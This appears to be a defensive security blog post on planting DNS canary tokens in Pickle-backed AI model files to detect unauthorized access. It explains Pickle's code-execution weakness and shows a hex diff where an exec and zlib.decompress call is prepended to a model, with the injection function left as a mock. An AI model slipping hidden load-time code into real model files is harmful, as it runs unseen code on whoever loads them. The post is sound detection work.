Defending AI Model Files from Unauthorized Access with Canaries

As AI models grow in capability and cost of creation, and hold more sensitive or proprietary data, securing them at rest is increasingly important. Organizations are designing policies and tools, often as part of data loss prevention and secure supply chain programs, to protect model weights.

While security engineering discussions focus on prevention (How do we prevent X?), detection (Did X happen?) is a similarly critical part of a mature defense-in-depth framework that significantly decreases the time required to detect, isolate, and remediate an intrusion. Currently, these detection capabilities for AI models are identical to those used for monitoring any other sensitive data—no detection capability focuses on the unique nature of AI/ML.

In this post, we’ll introduce canaries and then show how the common Python Pickle serialization format for AI and ML models can be augmented with canary tokens to provide additional, AI-specific loss detection capabilities extending beyond normal network monitoring solutions. While more secure model formats like safetensors are preferred, there are many reasons that organizations may still support Pickle-backed model files, and building defenses into them is part of a good risk mitigation strategy.

Canaries: lightweight tripwires

At the most basic level, canaries are artifacts left in the environment that no benign user would access. For example, an authorized user often memorizes their password, however, it is not common for the user to search for a password in a credential file and try using the credentials to authenticate to a service on the network.

Security engineers can create a fake credential, leave it someplace discoverable, and generate an alert to investigate its access and usage if the credential is ever used. This is the logic behind CanaryTokens. Canaries can be relatively fast and simple to generate, require almost no maintenance, lay dormant in your infrastructure for months, and when placed properly have few false positives.

Thinkst Canary is a security service that helps with the creation and monitoring of canaries. They support a wide range of formats and structures. In this case, we’re focusing on DNS Canarytokens.

Thinkst dynamically generates unique hostnames for each canary token you want to create. If that hostname is queried in DNS, you get an alert. The feature is incredibly scalable and offers the capability to create custom domains as well. While this blog post presents automated Canary creation, it’s also possible to manually use a free version of Canarytokens or build and maintain your own canary tracking and alerting system.

Machine learning model formats

The recent focus on machine learning security often focuses on the deserialization vulnerability of Python Pickle and Pickle-backed file formats. While this obviously includes files ending in .pkl, it may also include files like those generated by PyTorch or other ML-adjacent libraries such as NumPy.

If a user loads an untrusted Pickle, they’re exposing themselves to arbitrary code execution. Most of the analysis and scope of arbitrary code execution has focused on the potential for malware to impact the host or the machine learning system.

We asked ourselves: “If we must use models with this (vulner)ability, can we use it for good?”

Machine learning model canaries

It is relatively easy to inject code into a serialized model artifact that beacons as a canary. In our initial research, we used Thinkst DNS Canarytokens to preserve all original functionality but also silently beacon to Thinkst when loaded.

We can use this to either track usage or identify if someone is using a model that should never be used (a true canary). If necessary, with this alert, we can trigger an incident response playbook or hunt operation. Figure 1 shows the workflow from canary generation to an unauthorized user generating an alert.

Figure 1. The Canary Model generation and alerting process

As shown, in the following code block, the approach is easy to implement with Thinkst Canary or can be used with proprietary server-side tracking functionality.

After the new model artifact is generated, it can be placed in a location where authorized users are unlikely to access it. Canaries require very little active monitoring. Set them and forget about them until an alert is triggered.

def inject_pickle(original: Path, out: Path, target: str):
“””
Mock for a function that takes a pickle-backed model file, injects code to ping <target> and writes it to an output file
“””
return

def get_hostname(location: str) -> str:
“””
Register with Thinkst server and get DNS canary
“””
url = ‘https://EXAMPLE.canary.tools/api/v1/canarytoken/create’
payload = {
‘auth_token’: api_key,
‘memo’: f”ML Canary: {location}”,
‘kind’: ‘dns’,
}
r = requests.post(url, data=payload)
return r.json()[“canarytoken”][“hostname”]

def upload(file: Path, destination: str):
“””
Mock for uploading a file to a destination
“””
return

def create_canary(model_file: Path, canary_file: Path, destination: str):
“””
Register a new canary with Thinkst and generate a new ‘canarified’ model
“””
host = get_hostname(memo=f”Model Canary at {destination}/{canary_file.name}”)
inject_pickle(model_file, canary_file, host)
upload(canary_file, destination)

create_canary(“model.pkl”, “super_secret_model.pkl”, “s3://model-bucket/”)

The provided code contains a diff that demonstrates how the serialized model is prepended with a call to exec. This call functions as a beacon to our Canary DNS endpoint.

< 000001b0: 5496 3949 d7f8 bf94 8694 5294 8c10 5f73 T.9I……R…_s
< 000001c0: 6b6c 6561 726e 5f76 6572 7369 6f6e 948c klearn_version..
< 000001d0: 0531 2e31 2e33 9475 622e .1.1.3.ub.
—
> 000001b0: 5496 3949 d7f8 bf94 8694 5280 0263 5f5f T.9I……R..c__
> 000001c0: 6275 696c 7469 6e5f 5f0a 6578 6563 0a28 builtin__.exec.(
> 000001d0: 637a 6c69 620a 6465 636f 6d70 7265 7373 czlib.decompress

Here’s how it might work in practice. A security engineer creates a canary model file and places it in a private repository. Months later, a Thinkst Canary alert is triggered and an incident response process, tailored towards securing private repositories and sensitive models, is initiated. Leveraging this signal at its earliest stage, defenders can identify, isolate, and remediate the misconfiguration that enabled the unauthorized access.

The basic beacon on load functionality can be just the beginning, which is the beauty of arbitrary code execution. This technique could extended to more granular host fingerprinting or other cyber deception operations.

Secure AI strategy

A secure AI strategy can start with secure file formats and strong preventative controls. It’s important to consider mitigating residual risk by adding canary functionality to a detection strategy and be alerted if an unauthorized user accesses proprietary models.

Compared with other defensive controls, canary models are easy to implement, require no maintenance or overhead, and can generate actionable alerts. These techniques move us towards a world where unauthorized users should think twice before searching for, exfiltrating, and executing models.

For more information about AI Security, check out other NVIDIA Technical Blog posts.

Acknowledgment

We would like to recognize the contributions of United States Military Academy Cadet James Ruiz in prototyping Model Canaries during his Academic Individual Advanced Development experience with the NVIDIA AI Red Team.